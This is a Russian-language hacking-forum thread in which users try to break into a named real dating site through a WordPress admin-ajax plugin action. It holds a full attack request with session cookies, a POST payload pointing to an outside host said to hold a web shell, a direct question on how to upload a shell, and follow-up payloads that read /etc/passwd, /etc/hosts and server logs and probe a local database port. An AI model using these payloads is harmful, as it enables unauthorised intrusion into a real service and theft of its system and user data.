Помогите с интересным случаем

Discussion in 'Песочница' started by androd, 28 Sep 2016.

  1. androd

    androd Banned

    Joined:
    16 Sep 2016
    Messages:
    19
    Likes Received:
    1
    Reputations:
    2
    Собственно вот
    https://www.neu.de/pages/regionen/wp-admin/admin-ajax.php
    Это в Хеадер бросаем
    Content-Length: 92
    Content-Type: application/x-www-form-urlencoded
    Referer: http://www.neu.de:80/
    Cookie: meetic_cmk=749287; STACK_CMK=749287%2C050002%2C761711%2C749287%2C761711; KEYADE_LANDING_ID=6765; ADRUM_BT=R%3A88%7Cg%3A14925167-67d9-49b0-9c98-00eb756eae52507%7Cn%3Acustomer1_0d56a6e9-73d7-4300-8bf0-487f0dc402c5%7Ci%3A3229%7Cd%3A59%7Ce%3A79; MeeticLTM=3445911050.20992.0000; ky=3609280921000027597; XFrontLTM=2288283146.22784.0000; device_view=full; TyphLTM=1448439118.20480.0000; SEEMOVIE=1; meetic_sessid=02__3_4d1e3eaaf820c5c158471946c84d3d9d; SL2_OPTS=tpl%3D%3E20150112landing_seo_local_pages_area%7C%7Copts%3D%3E111111111111111011111%7C%7Cvtpl%3D%3E%2Fsignup%2F2015%2F01%2F12%2Flanding_seo_local_pages_area%7C%7Cversion%3D%3E6%7C%7Cextra_ft20%3D%3E9%7C%7Cextra_ft21%3D%3EA1; TRACKING_SIGNUP=TRUE; signupSurvey=1; GTM_STACK=%7B%22pageCategory%22%3A%22landing%22%2C%22visitorDemographicInfo%22%3A%22%22%2C%22visitorID%22%3A%223609280921000027597%22%2C%22visitorExistingCustomer%22%3Anull%2C%22visitorType%22%3A%22761711%22%7D; tk_lid=%2Fsignup%2Fsmart_landing%2F20150112landing_seo_local_pages_area; tl_klid=6765; tl_klid_auth=6765; GTM_GA_EVENT_TIME=f457cfb800fda11165f96085ff22990c; PHPSESSID=b035da4ea6b5ae757f51a3cdef9a3ee0; m_landingevents_new=a%3A3%3A%7Bs%3A7%3A%22guestid%22%3BN%3Bs%3A16%3A%22visitor_redirect%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22event_id%22%3Bs%3A4%3A%228507%22%3B%7D; back-to-home=http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29; tk_auth=ko; iteration-count=1; searchParameters[search_age_maxi]=45; searchParameters[search_age_mini]=25DIe; searchParameters[search_country]=GM; searchParameters[search_distance]=20; searchParameters[search_kvk]=HF; searchParameters[search_postcode]=68161; comment_author_b4c63e7779a9c285de3430f7b089be40=1; comment_author_email_b4c63e7779a9c285de3430f7b089be40=sample%40email.tst; meetic_mtsid=VIEW.987.641646035; wordpress_test_cookie=WP+Cookie+check; __kaPtClickId=3609280921000027597; comment_author_b4c63e7779a9c285de3430f7b089be40=1; comment_author_email_b4c63e7779a9c285de3430f7b089be40=sample%40email.tst; wordpress_test_cookie=WP+Cookie+check; tl_ktid_auth=0; cookie_signpost_2014=yes; tk_rck=1; tk_sck=1; NID=87=wGeenWBlfI16Fp4DEoq2eJIsfGOySx4tnI1IWFjsrIlZZLYyLPx9VsvND82NQLYHCe7KztevN_d_KZf7XzHlN9sLstbfLqoK_piKRoZylqlj4OfmkzHm7EpNWNYq3Paa; M_vsId=160928090947637756; K_68454=160928090947636264; TCID=ecf6d9a1cbe80ad513dd949c1eb3dd6a; anj=dTM7k!M4/8CxrEQF']wIg2Il`j-Z[n!]tbPB*SQLOsH`E!@E)l$ixc8; sess=1; test_cookie=CheckForPermission; uuid2=5763520604090199259; token=G/kOxgJR7GsYbCp1T0TY30psI4vh6c6QZuLZhKDQAYk=; regFields[birthdate][birthdate_day]=e; regFields[birthdate][birthdate_month]=e; regFields[birthdate][birthdate_year]=e; regFields[kvk][kvk]=11; regFields[my_email]=[email protected]; regFields[my_country]=GM; regFields[my_pseudo]=e; regFields[my_area]=1038; uid=c5b269fc-a1d8-4682-adef-b03d4b2d7601; id=22112358b1090084||t=1475046687|et=730|cs=002213fd486c6df184f72a1af5; IDE=AHWqTUkJ3k7l7rFetqQ2FF6VnQtH82kLpVwHfmTjEFqVBe--I39fihxDmQ; dyncdn=1; pdomid=83; sasd=%24a%3D0t%3B%24cn%3D0%5F0%3B%24isp%3D0%3B%24qc%3D1311362905%3B%24ql%3Dhigh%3B%24qpc%3D101001%3B%24qpp%3D0%3B%24qt%3D136%5F1021%5F10638t; regFields[my_zipcode]=
    Host: www.neu.de
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*
    и вот пост запрос
    action=lp_get_bl_singles&req_offer_nonce=2a2388ca12&url=http://lux-ledi.info/pas.txt
    Не обрабатывает как php а обрабатывает как html хотя от вордпреса php фаил работают
    Как залить шелл?
     
  2. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Это вы справляйтесь с ПМС?
     
  3. androd

    androd Banned

    Joined:
    16 Sep 2016
    Messages:
    19
    Likes Received:
    1
    Reputations:
    2
    Не понял вас
     
  4. androd

    androd Banned

    Joined:
    16 Sep 2016
    Messages:
    19
    Likes Received:
    1
    Reputations:
    2
    Там LFI в пост запросе
     
  5. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    http://lux-ledi.info/
    ваш сайт?


    Если ЛФИ, то вы не то делайте.
     
  6. androd

    androd Banned

    Joined:
    16 Sep 2016
    Messages:
    19
    Likes Received:
    1
    Reputations:
    2
    нет не мой)там просто шелл залит,а как правельно тогда делать?
     
  7. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    там не инклуд, там что-то другое.
     
  8. androd

    androd Banned

    Joined:
    16 Sep 2016
    Messages:
    19
    Likes Received:
    1
    Reputations:
    2
    action=lp_get_bl_singles&req_offer_nonce=2a2388ca12&url=file:///etc/passwd
    от так сделай
     
  9. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Ога , интересненько, буду дома гляну
     
  10. androd

    androd Banned

    Joined:
    16 Sep 2016
    Messages:
    19
    Likes Received:
    1
    Reputations:
    2
    Если убрать строчку
    Content-Type: application/x-www-form-urlencoded
    то перестает работать,может тут что шаманить нужно
     
  11. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Мне ничего кроме, сканирование, и чтение конфигов не приходит в голову

    PHP:
    action=lp_get_bl_singles

    &req_offer_nonce=2a2388ca12

    &url=http://127.0.0.1:3306



    &req_offer_nonce=2a2388ca12

    &url=file:///etc/hosts
    надо конфиги смотреть, как вариант может получится прочитать конфиг на сайте, но не уверен, всё таки пхп как текст может не отдаться
     
  12. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    PHP:
    action=lp_get_bl_singles

    &req_offer_nonce=2a2388ca12

    &url=file:///home/log/nginx/default.access.log
     
  13. androd

    androd Banned

    Joined:
    16 Sep 2016
    Messages:
    19
    Likes Received:
    1
    Reputations:
    2
    Content-Type: application/x-www-form-urlencoded
    В этой строке кроется весь смысл....
     
  14. androd

    androd Banned

    Joined:
    16 Sep 2016
    Messages:
    19
    Likes Received:
    1
    Reputations:
    2
    Вышло у кого что нибудь?